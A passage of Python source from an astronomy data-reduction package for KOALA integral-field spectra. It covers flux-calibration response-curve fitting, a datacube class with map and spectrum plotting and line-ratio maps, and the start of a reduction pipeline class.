valid_flux_smooth = interpolate.splev(valid_wl_smooth, tck_star, der=0)
valid_wave_min = min_wave
valid_wave_max = max_wave
edgelow = (np.abs(valid_wl_smooth - valid_wave_min)).argmin()
edgehigh = (np.abs(valid_wl_smooth - valid_wave_max)).argmin()
lambda_cal = valid_wl_smooth[edgelow:edgehigh]
flux_cal = valid_flux_smooth[edgelow:edgehigh]
lambda_min = lambda_cal - step
lambda_max = lambda_cal + step
if (
self.flux_cal_step == step
and self.flux_cal_min_wave == min_wave
and self.flux_cal_max_wave == max_wave
):
print(" This has been computed before for step= {} in range [ {} , {} ], using values computed before...".format(step, min_wave, max_wave))
measured_counts = self.flux_cal_measured_counts
else:
measured_counts = np.array(
[
self.fit_Moffat_between(lambda_min[i], lambda_max[i])[0]
if lambda_cal[i] > min_wave
and lambda_cal[i] < max_wave # 6200 #3650 # 7400 #5700
else np.NaN
for i in range(len(lambda_cal))
]
)
self.flux_cal_step = step
self.flux_cal_min_wave = min_wave
self.flux_cal_max_wave = max_wave
self.flux_cal_measured_counts = measured_counts
_response_curve_ = (
old_div(old_div(measured_counts, flux_cal), exp_time) # TODO, function is not called. fix once called
) # Added exp_time Jan 2019 counts / (ergs/cm/cm/s/A * 10**16) / s = counts * ergs*cm*cm*A / 10**16
if np.isnan(_response_curve_[0]) == True:
_response_curve_[0] = _response_curve_[
1
] # - (response_curve[2] - response_curve[1])
scale = np.nanmedian(_response_curve_)
# self.integrated_star_flux = self.half_light_spectrum(5, plot=plot, min_wave=min_wave, max_wave=max_wave)
edgelow_ = (np.abs(self.wavelength - lambda_cal[0])).argmin()
edgehigh_ = (np.abs(self.wavelength - lambda_cal[-1])).argmin()
self.response_wavelength = self.wavelength[edgelow_:edgehigh_]
response_wavelength = []
response_curve = []
if ha_width > 0:
skipping = 0
print(" Skipping H-alpha absorption with width ={} A ...".format(ha_width))
for i in range(len(lambda_cal)):
if (
lambda_cal[i] > 6563 - ha_width / 2.0
and lambda_cal[i] < 6563 + ha_width / 2.0
):
# print " Skipping ",lambda_cal[i]
skipping = skipping + 1
else:
response_wavelength.append(lambda_cal[i])
response_curve.append(_response_curve_[i])
print(" ... Skipping a total of {} wavelength points".format(skipping))
else:
response_wavelength = lambda_cal
response_curve = _response_curve_
if fit_degree == 0:
print(" Using interpolated data with smooth = {} for computing the response curve... ".format(smooth))
median_kernel = 151
response_curve_medfilt = sig.medfilt(response_curve, np.int(median_kernel))
interpolated_flat = interpolate.splrep(
response_wavelength, response_curve_medfilt, s=smooth
)
self.response_curve = interpolate.splev(
self.response_wavelength, interpolated_flat, der=0
)
else:
if fit_degree != 9:
if fit_degree != 7:
if fit_degree != 5:
if fit_degree != 3:
print(" We can't use a polynomium of grade here, using fit_degree = 3 instead".format(fit_degree))
fit_degree = 3
if fit_degree == 3:
a3x, a2x, a1x, a0x = np.polyfit(response_wavelength, response_curve, 3)
a4x = 0
a5x = 0
a6x = 0
a7x = 0
a8x = 0
a9x = 0
if fit_degree == 5:
a5x, a4x, a3x, a2x, a1x, a0x = np.polyfit(
response_wavelength, response_curve, 5
)
a6x = 0
a7x = 0
a8x = 0
a9x = 0
if fit_degree == 7:
a7x, a6x, a5x, a4x, a3x, a2x, a1x, a0x = np.polyfit(
response_wavelength, response_curve, 7
)
a8x = 0
a9x = 0
if fit_degree == 9:
a9x, a8x, a7x, a6x, a5x, a4x, a3x, a2x, a1x, a0x = np.polyfit(
response_wavelength, response_curve, 9
)
wlm = self.response_wavelength
self.response_curve = (
a0x
+ a1x * wlm
+ a2x * wlm ** 2
+ a3x * wlm ** 3
+ a4x * wlm ** 4
+ a5x * wlm ** 5
+ a6x * wlm ** 6
+ a7x * wlm ** 7
+ a8x * wlm ** 8
+ a9x * wlm ** 9
) # Better use next
# Adapting Matt code for trace peak ----------------------------------
smoothfactor = 2
wl = response_wavelength # response_wavelength
x = response_curve
odd_number = (
smoothfactor * int((np.sqrt(len(wl))/2)) - 1
) # Originarily, smoothfactor = 2
print(" Using medfilt window = {} for fitting...".format(odd_number))
# fit, trimming edges
# index=np.arange(len(x))
# edgelow=0
# edgehigh=1
# valid_ind=np.where((index >= edgelow) & (index <= len(wl)-edgehigh) & (~np.isnan(x)) )[0]
# print valid_ind
# valid_wl = wl[edgelow:-edgehigh] # wl[valid_ind]
# valid_x = x[edgelow:-edgehigh] #x[valid_ind]
# wlm = sig.medfilt(valid_wl, odd_number)
# wx = sig.medfilt(valid_x, odd_number)
wlm = sig.medfilt(wl, odd_number)
wx = sig.medfilt(x, odd_number)
# iteratively clip and refit for WX
maxit = 10
niter = 0
stop = 0
fit_len = 100 # -100
while stop < 1:
# print ' Trying iteration ', niter,"..."
# a2x,a1x,a0x = np.polyfit(wlm, wx, 2)
fit_len_init = copy.deepcopy(fit_len)
if niter == 0:
fit_index = np.where(wx == wx)
fit_len = len(fit_index)
sigma_resid = 0.0
if niter > 0:
sigma_resid = median_absolute_deviation(resid)
fit_index = np.where(np.abs(resid) < 4 * sigma_resid)[0]
fit_len = len(fit_index)
try:
p = np.polyfit(wlm[fit_index], wx[fit_index], fit_degree)
pp = np.poly1d(p)
fx = pp(wl)
fxm = pp(wlm)
resid = wx - fxm
# print " Iteration {:2} results in RA: sigma_residual = {:.6f}, fit_len = {:5} fit_len ={:5}".format(niter,sigma_resid,fit_len_init,fit_len)
except Exception:
print(" Skipping iteration {}".format(niter))
if (niter >= maxit) or (fit_len_init == fit_len):
if niter >= maxit:
print(" Max iterations, {:2}, reached!")
if fit_len_init == fit_len:
print(" All interval fitted in iteration {:2} ! ".format(niter))
stop = 2
niter = niter + 1
# --------------------------------------------------------------------
if plot:
plt.figure(figsize=(10, 8))
plt.plot(
lambda_cal,
old_div(measured_counts, exp_time), # TODO, function is not called. fix once called
"g+",
ms=10,
mew=3,
label="measured counts",
)
plt.plot(lambda_cal, flux_cal * scale, "k*-", label="flux_cal * scale")
plt.plot(
lambda_cal,
flux_cal * _response_curve_,
"c:",
label="flux_cal * response",
)
plt.xlim(np.min(self.wavelength), np.max(self.wavelength))
plt.ylabel("Flux")
plt.xlabel("Wavelength [$\AA$]")
plt.title("Response curve for absolute flux calibration using {}".format(self.object))
plt.legend(frameon=False, loc=1)
plt.grid(which="both")
plt.axvline(x=min_wave, color="k", linestyle="--", alpha=0.5)
plt.axvline(x=max_wave, color="k", linestyle="--", alpha=0.5)
plt.minorticks_on()
# plt.show()
# plt.close()
plt.figure(figsize=(10, 8))
if fit_degree > 0:
text = "Fit using polynomium of degree {}".format(fit_degree)
else:
text = "Using interpolated data with smooth = {}".format(smooth)
plt.plot(
self.response_wavelength,
self.response_curve,
"r-",
alpha=0.4,
linewidth=4,
label=text,
)
plt.plot(lambda_cal, _response_curve_, "k--", alpha=0.8)
plt.plot(
response_wavelength,
response_curve,
"g-",
alpha=0.8,
label="Response curve",
)
plt.plot(
wl, fx, "b-", linewidth=6, alpha=0.5, label="Response curve (filtered)"
)
plt.xlim(np.min(self.wavelength), np.max(self.wavelength))
plt.ylabel("Flux")
plt.xlabel("Wavelength [$\AA$]")
plt.title("Response curve for absolute flux calibration using {}".format(self.object))
plt.minorticks_on()
plt.grid(which="both")
plt.axvline(x=min_wave, color="k", linestyle="--", alpha=0.5)
plt.axvline(x=max_wave, color="k", linestyle="--", alpha=0.5)
plt.legend(frameon=True, loc=4, ncol=4)
# plt.show()
# plt.close()
interpolated_flat = interpolate.splrep(response_wavelength, fx) # , s=smooth)
self.response_curve = interpolate.splev(
self.response_wavelength, interpolated_flat, der=0
)
# plt.plot(self.response_wavelength, self.response_curve, "b-", alpha=0.5, linewidth=6, label = "Response curve (filtered)")
print(" Min wavelength at {:.2f} with value = {:.3f} /s".format(
self.response_wavelength[0], self.response_curve[0]
))
print(" Max wavelength at {:.2f} with value = {:.3f} /s".format(
self.response_wavelength[-1], self.response_curve[-1]
))
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def fit_Moffat_between(self, min_wave=0, max_wave=0, r_max=5, plot=False):
"""
Parameters
----------
min_wave
max_wave
r_max
plot
Returns
-------
"""
if min_wave == 0:
min_wave = self.valid_wave_min
if max_wave == 0:
max_wave = self.valid_wave_max
(
r2_growth_curve,
F_growth_curve,
flux,
r2_half_light,
) = self.growth_curve_between(min_wave, max_wave, plot)
flux, alpha, beta = fit_Moffat(
r2_growth_curve, F_growth_curve, flux, r2_half_light, r_max, plot
)
r2_half_light = alpha * (np.power(2.0, 1.0 / beta) - 1)
if plot:
print("Moffat fit: Flux = {:.3e},".format(flux), "HWHM = {:.3f},".format(
np.sqrt(r2_half_light) * self.pixel_size_arcsec
), "beta = {:.3f}".format(beta))
return flux, np.sqrt(r2_half_light) * self.pixel_size_arcsec, beta
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# CUBE CLASS (ANGEL + BEN) ALL OF THIS NEEDS TO BE CAREFULLY TESTED & UPDATED!
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
class CUBE(RSS, Interpolated_cube):
"""
This class reads the FITS files with COMBINED datacubes.
Routines included:
- cube.map_wavelength(wavelength, contours=True)\n
- cube.plot_spectrum_cube(x,y, fcal=True)
"""
# -----------------------------------------------------------------------------
def __init__(self, filename):
# Create RSS object
super(CUBE, self).__init__()
print("\n> Reading combined datacube ''{}''".format(filename))
RSS_fits_file = fits.open(filename) # Open file
# General info:
self.object = RSS_fits_file[0].header["OBJECT"]
# self.description = self.object + ' - ' + filename
self.description = RSS_fits_file[0].header[
"DESCRIP"
] # NOTE: it was originally "DEF"
self.RA_centre_deg = RSS_fits_file[0].header["RAcen"]
self.DEC_centre_deg = RSS_fits_file[0].header["DECcen"]
self.PA = RSS_fits_file[0].header["PA"]
self.wavelength = RSS_fits_file[1].data # TODO: why is this 1? shouldn't it be [0], maybe cause we are doing the biggest variance?
self.flux_calibration = RSS_fits_file[2].data
self.n_wave = len(self.wavelength)
self.data = RSS_fits_file[0].data
self.wave_resolution = (self.wavelength[-1] - self.wavelength[0])/self.n_wave
self.n_cols = RSS_fits_file[0].header["Ncols"]
self.n_rows = RSS_fits_file[0].header["Nrows"]
self.pixel_size_arcsec = RSS_fits_file[0].header["PIXsize"]
self.flux_calibrated = RSS_fits_file[0].header["FCAL"]
self.number_of_combined_files = RSS_fits_file[0].header["COFILES"]
self.offsets_files = RSS_fits_file[0].header["OFFSETS"]
print("\n Object = {}".format(self.object))
print(" Description = {}".format(self.description))
print(" Centre: RA = {} Deg".format(self.RA_centre_deg))
print(" DEC = {} Deg".format(self.DEC_centre_deg))
print(" PA = {} Deg".format(self.PA))
print(" Size [pix] = {} x {}".format(self.n_rows, self.n_cols))
print(" Size [arcsec] = {} x {}".format(self.n_rows * self.pixel_size_arcsec, self.n_cols * self.pixel_size_arcsec))
print(" Pix size = {} arcsec".format(self.pixel_size_arcsec))
print(" Files combined = {}".format(self.number_of_combined_files))
print(" Offsets used = {}".format(self.offsets_files))
print(" Wave Range = [ {} , {} ]".format(self.wavelength[0], self.wavelength[-1]))
print(" Wave Resol. = {} A/pix".format(self.wave_resolution))
print(" Flux Cal. = {}".format(self.flux_calibrated))
print("\n> Use these parameters for acceding the data :\n")
print(" cube.wavelength : Array with wavelengths")
print(" cube.data[w,x,y] : Flux of the w wavelength in spaxel (x,y)")
if self.flux_calibrated:
print(" cube.flux_calibration : Flux calibration per wavelength [ 1 / (1E-16 * erg/cm**2/s/A) ] ")
print("\n> Cube readed! ")
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def map_wavelength(
self,
wavelength,
cmap="fuego",
fig_size=10,
norm=colors.PowerNorm(gamma=1.0 / 4.0),
save_file="",
contours=True,
fcal=False,
):
"""
Plot map at a particular wavelength.
Parameters
----------
wavelength: float
wavelength to be mapped.
norm:
Colour scale, default = colors.PowerNorm(gamma=1./4.)\n
Log scale: norm=colors.LogNorm() \n
Lineal scale: norm=colors.Normalize().
cmap:
Color map used, default cmap="fuego"\n
Weight: cmap = "gist_gray" \n
Velocities: cmap="seismic".\n
Try also "inferno",
save_file:
(Optional) Save plot in file "file.extension"
Example
-------
>>> cube.map_wavelength(6820, contours=True, cmap="seismic")
"""
if fcal:
interpolated_map = self.data[np.searchsorted(self.wavelength, wavelength)]
else:
interpolated_map = self.data[np.searchsorted(self.wavelength, wavelength)]
title = "{} - {} $\AA$".format(self.description, wavelength)
self.plot_map(
interpolated_map,
cmap=cmap,
fig_size=fig_size,
norm=norm,
contours=contours,
save_file=save_file,
title=title,
fcal=fcal,
) # CHECK
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
def plot_map(
self,
mapa,
cmap="fuego",
fig_size=10,
norm=colors.PowerNorm(gamma=1.0 / 4.0),
save_file="",
contours=True,
title="",
vmin=0,
vmax=1000,
fcal=False,
log=False,
clabel=False,
barlabel="",
):
"""
Plot a given map.
Parameters
----------
wavelength: float
wavelength to be mapped.
norm:
Colour scale, default = colors.PowerNorm(gamma=1./4.)\n
Log scale: norm=colors.LogNorm() \n
Lineal scale: norm=colors.Normalize().
cmap:
Color map used, default cmap="fuego"\n
Weight: cmap = "gist_gray" \n
Velocities: cmap="seismic".\n
Try also "inferno",
save_file:
(Optional) Save plot in file "file.extension"
Example
-------
>>> cube.plot_map(mapa, contours=True, cmap="seismic")
"""
fig, ax = plt.subplots(figsize=(fig_size, fig_size))
if log:
cax = ax.imshow(
mapa,
origin="lower",
interpolation="none",
norm=colors.LogNorm(vmin=vmin, vmax=vmax),
cmap=cmap,
extent=(
-0.5 * self.n_cols * self.pixel_size_arcsec,
0.5 * self.n_cols * self.pixel_size_arcsec,
-0.5 * self.n_rows * self.pixel_size_arcsec,
0.5 * self.n_rows * self.pixel_size_arcsec,
),
)
print("Map in log scale")
else:
cax = ax.imshow(
mapa,
origin="lower",
interpolation="none",
norm=norm,
cmap=cmap,
extent=(
-0.5 * self.n_cols * self.pixel_size_arcsec,
0.5 * self.n_cols * self.pixel_size_arcsec,
-0.5 * self.n_rows * self.pixel_size_arcsec,
0.5 * self.n_rows * self.pixel_size_arcsec,
),
vmin=vmin,
vmax=vmax,
)
if contours:
CS = plt.contour(
mapa,
extent=(
-0.5 * self.n_cols * self.pixel_size_arcsec,
0.5 * self.n_cols * self.pixel_size_arcsec,
-0.5 * self.n_rows * self.pixel_size_arcsec,
0.5 * self.n_rows * self.pixel_size_arcsec,
),
)
if clabel:
plt.clabel(CS, inline=1, fontsize=10)
ax.set_title(title, fontsize=fig_size * 1.3)
plt.tick_params(labelsize=fig_size)
plt.xlabel("$\Delta$ RA [arcsec]", fontsize=fig_size * 1.2)
plt.ylabel("$\Delta$ DEC [arcsec]", fontsize=fig_size * 1.2)
# plt.legend(loc='upper right', frameon=False)
plt.minorticks_on()
plt.grid(which="both", color="green")
plt.gca().invert_xaxis()
sm = plt.cm.ScalarMappable(cmap=cmap, norm=plt.Normalize(vmin=vmin, vmax=vmax))
sm._A = []
cbar = fig.colorbar(sm, fraction=0.0499, pad=0.02)
# cbar = fig.colorbar(cax, fraction=0.0490, pad=0.04, norm=colors.Normalize(clip=False))
if barlabel == "":
if fcal:
barlabel = "{}".format("Integrated Flux [10$^{-16}$ erg s$^{-1}$ cm$^{-2}$]")
else:
barlabel = "{}".format("Integrated Flux [Arbitrary units]")
# if fcal:
# cbar.set_label("{}".format("Integrated Flux [10$^{-16}$ erg s$^{-1}$ cm$^{-2}$]"), rotation=270, labelpad=40, fontsize=fig_size*1.2)
# else:
# cbar.set_label("{}".format("Integrated Flux [Arbitrary units]"), rotation=270, labelpad=40, fontsize=fig_size*1.2)
cbar.set_label(barlabel, rotation=270, labelpad=20, fontsize=fig_size * 1.2)
# cbar.ax.set_yticklabels(['< -1', '0', '> 1'])# vertically oriented colorbar
# cbar.set_ticks([1.5,2,3,4,5,6], update_ticks=True)
# cbar.set_ticklabels([1.5,2,3,4,5,6])
if save_file == "":
#plt.show()
pass
else:
plt.savefig(save_file)
plt.close()
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
#
# BEN ROUTINES
#
#
def subtractContinuum(self, spectrum):
"""
Subtract the median value from each intensity in a provided spectrum.
Parameters
----------
spectrum:
The list of intensities.
"""
med = np.nanmedian(spectrum)
for i in range(len(spectrum)):
spectrum[i] = spectrum[i] - med
if spectrum[i] < 0:
spectrum[i] = 0
return spectrum
def plot_spectrum_cube_ben(
self,
x,
y,
lmin=0,
lmax=0,
fmin=1e-30,
fmax=1e30,
fig_size=10,
save_file="",
fcal=False,
):
"""
Plot spectrum of a particular spaxel.
Parameters
----------
x, y:
coordenates of spaxel to show spectrum.
lmin, lmax:
The range of wavelengths to plot. Default is whole spectrum.
fmin, fmax:
Plot spectrum in flux range [fmin, fmax]
fcal:
Use flux calibration, default fcal=False.\n
If fcal=True, cube.flux_calibration is used.
save_file:
(Optional) Save plot in file "file.extension"
fig_size:
Size of the figure (in x-axis), default: fig_size=10
Example
-------
>>> cube.plot_spectrum_cube_ben(20, 20, fcal=True)
"""
# Define x and y axis to plot
newWave = []
newSpectrum = []
if fcal == False:
spectrum = self.data[:, x, y]
ylabel = "Flux [relative units]"
else:
spectrum = (self.data[:, x, y]/self.flux_calibration)/1e16
# ylabel="Flux [ 10$^{-16}$ * erg cm$^{-2}$ s$^{-1}$ A$^{-1}$]"
ylabel = "Flux [ erg cm$^{-2}$ s$^{-1}$ A$^{-1}$]"
# Remove NaN values from spectrum and replace them with zero.
spectrum = np.nan_to_num(spectrum)
# Subtract continuum from spectrum
subSpectrum = self.subtractContinuum(spectrum)
if fmin == 1e-30:
fmin = np.nanmin(spectrum)
if fmax == 1e30:
fmax = np.nanmax(spectrum)
# Since I can't define the correct default startpoint/endpoint within the
# function arguments section, I set them here.
if lmin == 0:
lmin = self.wavelength[0]
if lmax == 0:
lmax = self.wavelength[-1]
# Create a new list of wavelengths to plot based on the provided
# wavelength startpoint and endpoint.
for i in range(len(self.wavelength)):
if self.wavelength[i] >= lmin and self.wavelength[i] <= lmax:
newWave.append(self.wavelength[i])
newSpectrum.append(subSpectrum[i])
plt.figure(figsize=(fig_size, fig_size / 2.5))
plt.plot(newWave, newSpectrum)
plt.ylim([fmin, fmax])
plt.xlim([lmin, lmax])
plt.minorticks_on()
title = "Spectrum of spaxel ({} , {}) in {}".format(x, y, self.description)
plt.title(title, fontsize=fig_size * 1.2)
plt.tick_params(labelsize=fig_size * 0.8)
plt.xlabel("Wavelength [$\AA$]", fontsize=fig_size * 1)
plt.ylabel(ylabel, fontsize=fig_size * 1)
if save_file == "":
#plt.show()
pass
else:
plt.savefig(save_file)
plt.close()
def calculateRatio(self, x, y, aStart, aEnd, bStart, bEnd, fcal=False):
"""
Given two wavelengths ranges, find the peak intensities and calculate the ratio
between them.
Parameters
----------
x, y:
The spaxel we are interested in.
aStart, aEnd:
The startpoint and endpoint of the range that the first emission line
will fall in.
bStart, bEnd:
The startpoint and endpoint of the range that the second emission line
will fall in.
"""
aFirstIndex = np.searchsorted(self.wavelength, aStart)
aLastIndex = np.searchsorted(self.wavelength, aEnd)
bFirstIndex = np.searchsorted(self.wavelength, bStart)
bLastIndex = np.searchsorted(self.wavelength, bEnd)
if fcal == False:
spectrum = self.data[:, x, y]
else:
spectrum = (self.data[:, x, y]/self.flux_calibration)/1e16
spectrum = np.nan_to_num(spectrum)
subSpectrum = self.subtractContinuum(spectrum)
aValues = []
tempIndex = aFirstIndex
while tempIndex <= aLastIndex:
aValues.append(subSpectrum[tempIndex])
tempIndex = tempIndex + 1
aMax = np.nanmax(aValues)
bValues = []
tempIndex = bFirstIndex
while tempIndex <= bLastIndex:
bValues.append(subSpectrum[tempIndex])
tempIndex = tempIndex + 1
bMax = np.nanmax(bValues)
return aMax/bMax
def createRatioMap(self, aStart, aEnd, bStart, bEnd, fcal=False):
xLength = len(self.data[0, :, 0])
yLength = len(self.data[0, 0, :])
aFirstIndex = np.searchsorted(self.wavelength, aStart)
aLastIndex = np.searchsorted(self.wavelength, aEnd)
bFirstIndex = np.searchsorted(self.wavelength, bStart)
bLastIndex = np.searchsorted(self.wavelength, bEnd)
ratioMap = [[i for i in range(yLength)] for j in range(xLength)]
for y in range(yLength):
print("Column {}".format(y))
for x in range(xLength):
if fcal == False:
spectrum = self.data[:, x, y]
else:
spectrum = (self.data[:, x, y]/self.flux_calibration)/1e16
spectrum = np.nan_to_num(spectrum)
subSpectrum = self.subtractContinuum(spectrum)
subAvg = np.average(subSpectrum)
aValues = []
tempIndex = aFirstIndex
while tempIndex <= aLastIndex:
aValues.append(subSpectrum[tempIndex])
tempIndex = tempIndex + 1
aMax = np.nanmax(aValues)
bValues = []
tempIndex = bFirstIndex
while tempIndex <= bLastIndex:
bValues.append(subSpectrum[tempIndex])
tempIndex = tempIndex + 1
bMax = np.nanmax(bValues)
if aMax > subAvg and bMax > subAvg:
ratio = aMax/bMax
else:
ratio = 0
ratioMap[x][y] = ratio
return ratioMap
# -----------------------------------------------------------------------------
# MACRO FOR EVERYTHING 19 Sep 2019, including alignment 2-10 cubes
# -----------------------------------------------------------------------------
class KOALA_reduce(RSS, Interpolated_cube): # TASK_KOALA_reduce
def __init__(
self,
rss_list,
fits_file="",
obj_name="",
description="",
do_rss=True,
do_cubing=True,
do_alignment=True,
make_combined_cube=True,
rss_clean=False,
save_rss_to_fits_file_list=["", "", "", "", "", "", "", "", "", ""],
save_aligned_cubes=False,
# RSS
# skyflat_file is a RSS, skyflat and skyflat_list are the names of objects keeping the relative throughput of skyflats
apply_throughput=True,
skyflat="",
skyflat_file="",
flat="",
skyflat_list=["", "", "", "", "", "", "", "", "", ""],
# This line is needed if doing FLAT when reducing (NOT recommended)
plot_skyflat=False,
wave_min_scale=0,
wave_max_scale=0,
ymin=0,
ymax=0,
# Correct CCD defects & high cosmics
correct_ccd_defects=False,
correct_high_cosmics=False,
clip_high=100,
step_ccd=50,
remove_5578=False,
plot_suspicious_fibres=False,
# Correct for small shofts in wavelength
fix_wavelengths=False,
sol=[0, 0, 0],
# Correct for extinction
do_extinction=True,
# Sky substraction
sky_method="self",
n_sky=50,
sky_fibres=[1000], # do_sky=True
sky_spectrum=[0],
sky_rss=[0],
scale_sky_rss=0,
scale_sky_1D=0,
correct_negative_sky=False,
auto_scale_sky=False,
sky_wave_min=0,
sky_wave_max=0,
cut_sky=5.0,
fmin=1,
fmax=10,
individual_sky_substraction=False,
fibre_list=[100, 200, 300, 400, 500, 600, 700, 800, 900],
sky_list=[[0], [0], [0], [0], [0], [0], [0], [0], [0], [0]],
# Telluric correction
telluric_correction=[0],
telluric_correction_list=[[0], [0], [0], [0], [0], [0], [0], [0], [0], [0]],
# Identify emission lines
id_el=False,
high_fibres=10,
brightest_line="Ha",
cut=1.5,
plot_id_el=True,
broad=2.0,
id_list=[0],
brightest_line_wavelength=0,
# Clean sky residuals
clean_sky_residuals=False,
dclip=3.0,
extra_w=1.3,
step_csr=25,
# CUBING
pixel_size_arcsec=0.4, # NOTE: changed pixel_size_arcsec to kernel_size to fix name errors
kernel_size_arcsec=1.2, # NOTE: changed kernel_size_arcsec to kernel_size to fix name errors
offsets=[1000],
ADR=False,
flux_calibration=[0],
flux_calibration_list=[[0], [0], [0], [0], [0], [0], [0], [0], [0], [0]],
# COMMON TO RSS AND CUBING
valid_wave_min=0,
valid_wave_max=0,
plot=True,
norm=colors.LogNorm(),
fig_size=12,
warnings=False,
verbose=False,
):
"""
Example
-------
>>> combined_KOALA_cube(['Ben/16jan10049red.fits','Ben/16jan10050red.fits','Ben/16jan10051red.fits'],
fits_file="test_BLUE_reduced.fits", skyflat_file='Ben/16jan10086red.fits',
pixel_size_arcsec=.3, kernel_size_arcsec=1.5, flux_calibration=flux_calibration,
plot= True)
"""
print("\n\n\n======================= REDUCING KOALA data =======================\n\n")
n_files = len(rss_list)
sky_rss_list = [[0], [0], [0], [0], [0], [0], [0], [0], [0], [0]]
pk = ("_{}p{}_{}k{}".format(
int(pixel_size_arcsec), int((abs(pixel_size_arcsec) - abs(int(pixel_size_arcsec))) * 10),
int(kernel_size_arcsec), int((abs(kernel_size_arcsec) - abs(int(kernel_size_arcsec))) * 100)
)
)
print(" 1. Checking input values: ")
print("\n - Using the following RSS files : ")
for rss in range(n_files):
print(" ", rss + 1, ". : ", rss_list[rss])
self.rss_list = rss_list
if rss_clean:
print("\n - These RSS files are ready to be cubed & combined, no further process required ...")
else:
if skyflat == "" and skyflat_list[0] == "" and skyflat_file == "":
print("\n - No skyflat file considered, no throughput correction will be applied.")
else:
if skyflat_file == "":
print("\n - Using skyflat to consider throughput correction ...")
if skyflat != "":
for i in range(n_files):
skyflat_list[i] = skyflat
print(" Using same skyflat for all object files")
else:
print(" List of skyflats provided!")
else:
print("\n - Using skyflat file to derive the throughput correction ...") # This assumes skyflat_file is the same for all the objects
skyflat = KOALA_RSS(
skyflat_file,
do_sky=False,
do_extinction=False,
apply_throughput=False,
plot=True,
)
skyflat.find_relative_throughput(
ymin=ymin,
ymax=ymax,
wave_min_scale=wave_min_scale,
wave_max_scale=wave_max_scale,
plot=plot_skyflat,
)
for i in range(n_files):
skyflat_list[i] = skyflat
print(" - Using same skyflat for all object files")
# sky_method = "self" "1D" "2D" "none" #1Dfit"
if sky_method == "1D" or sky_method == "1Dfit":
if np.nanmedian(sky_spectrum) != 0:
for i in range(n_files):
sky_list[i] = sky_spectrum
print("\n - Using same 1D sky spectrum provided for all object files")
else:
if np.nanmedian(sky_list[0]) == 0:
print("\n - 1D sky spectrum requested but not found, assuming n_sky = 50 from the same files")
sky_method = "self"
else:
print("\n - List of 1D sky spectrum provided for each object file")
if sky_method == "2D":
try:
if np.nanmedian(sky_list[0].intensity_corrected) != 0:
print("\n - List of 2D sky spectra provided for each object file")
for i in range(n_files):
sky_rss_list[i] = sky_list[i]
sky_list[i] = [0]
except Exception:
try:
if sky_rss == 0:
print("\n - 2D sky spectra requested but not found, assuming n_sky = 50 from the same files")
sky_method = "self"
except Exception:
for i in range(n_files):
sky_rss_list[i] = sky_rss
print("\n - Using same 2D sky spectra provided for all object files")
if sky_method == "self":
for i in range(n_files):
sky_list[i] = 0
if n_sky == 0:
n_sky = 50
if sky_fibres[0] == 1000:
print("\n - Using n_sky =", n_sky, "to create a sky spectrum")
else:
print("\n - Using n_sky =", n_sky, "and sky_fibres =", sky_fibres, "to create a sky spectrum")
if (
np.nanmedian(telluric_correction) == 0
and np.nanmedian(telluric_correction_list[0]) == 0
):
print("\n - No telluric correction considered")
else:
if np.nanmedian(telluric_correction_list[0]) == 0:
for i in range(n_files):
telluric_correction_list[i] = telluric_correction
print("\n - Using same telluric correction for all object files")
else:
print("\n - List of telluric corrections provided!")
if do_rss:
print("\n 2. Reading the data stored in rss files ...")
self.rss1 = KOALA_RSS(
rss_list[0],
rss_clean=rss_clean,
save_rss_to_fits_file=save_rss_to_fits_file_list[0],
apply_throughput=apply_throughput,
skyflat=skyflat_list[0],
plot_skyflat=plot_skyflat,
correct_ccd_defects=correct_ccd_defects,
correct_high_cosmics=correct_high_cosmics,
clip_high=clip_high,
step_ccd=step_ccd,
remove_5578=remove_5578,
plot_suspicious_fibres=plot_suspicious_fibres,
fix_wavelengths=fix_wavelengths,
sol=sol,
do_extinction=do_extinction,
scale_sky_1D=scale_sky_1D,
correct_negative_sky=correct_negative_sky,
sky_method=sky_method,
n_sky=n_sky,
sky_fibres=sky_fibres,
sky_spectrum=sky_list[0],
sky_rss=sky_rss_list[0],
brightest_line_wavelength=brightest_line_wavelength,
cut_sky=cut_sky,
fmin=fmin,
fmax=fmax,
individual_sky_substraction=individual_sky_substraction,
telluric_correction=telluric_correction_list[0],
id_el=id_el,
high_fibres=high_fibres,
brightest_line=brightest_line,
cut=cut,
broad=broad,
plot_id_el=plot_id_el,
id_list=id_list,
clean_sky_residuals=clean_sky_residuals,
dclip=dclip,
extra_w=extra_w,
step_csr=step_csr,
valid_wave_min=valid_wave_min,
valid_wave_max=valid_wave_max,
warnings=warnings,
verbose=verbose,
plot=plot,
norm=norm,
fig_size=fig_size,
)
if len(rss_list) > 1:
self.rss2 = KOALA_RSS(
rss_list[1],
rss_clean=rss_clean,
save_rss_to_fits_file=save_rss_to_fits_file_list[1],
apply_throughput=apply_throughput,
skyflat=skyflat_list[1],
plot_skyflat=plot_skyflat,
correct_ccd_defects=correct_ccd_defects,
correct_high_cosmics=correct_high_cosmics,
clip_high=clip_high,
step_ccd=step_ccd,
remove_5578=remove_5578,
plot_suspicious_fibres=plot_suspicious_fibres,
fix_wavelengths=fix_wavelengths,
sol=sol,
do_extinction=do_extinction,
scale_sky_1D=scale_sky_1D,
correct_negative_sky=correct_negative_sky,
sky_method=sky_method,
n_sky=n_sky,
sky_fibres=sky_fibres,
sky_spectrum=sky_list[1],
sky_rss=sky_rss_list[1],
brightest_line_wavelength=brightest_line_wavelength,
cut_sky=cut_sky,
fmin=fmin,
fmax=fmax,
individual_sky_substraction=individual_sky_substraction,
telluric_correction=telluric_correction_list[1],
id_el=id_el,
high_fibres=high_fibres,
brightest_line=brightest_line,
cut=cut,
broad=broad,
plot_id_el=plot_id_el,
id_list=id_list,
clean_sky_residuals=clean_sky_residuals,
dclip=dclip,
extra_w=extra_w,
step_csr=step_csr,
valid_wave_min=valid_wave_min,
valid_wave_max=valid_wave_max,
warnings=warnings,
verbose=verbose,
plot=plot,
norm=norm,
fig_size=fig_size,
)
if len(rss_list) > 2:
self.rss3 = KOALA_RSS(
rss_list[2],
rss_clean=rss_clean,
save_rss_to_fits_file=save_rss_to_fits_file_list[2],
apply_throughput=apply_throughput,
skyflat=skyflat_list[2],
plot_skyflat=plot_skyflat,
correct_ccd_defects=correct_ccd_defects,
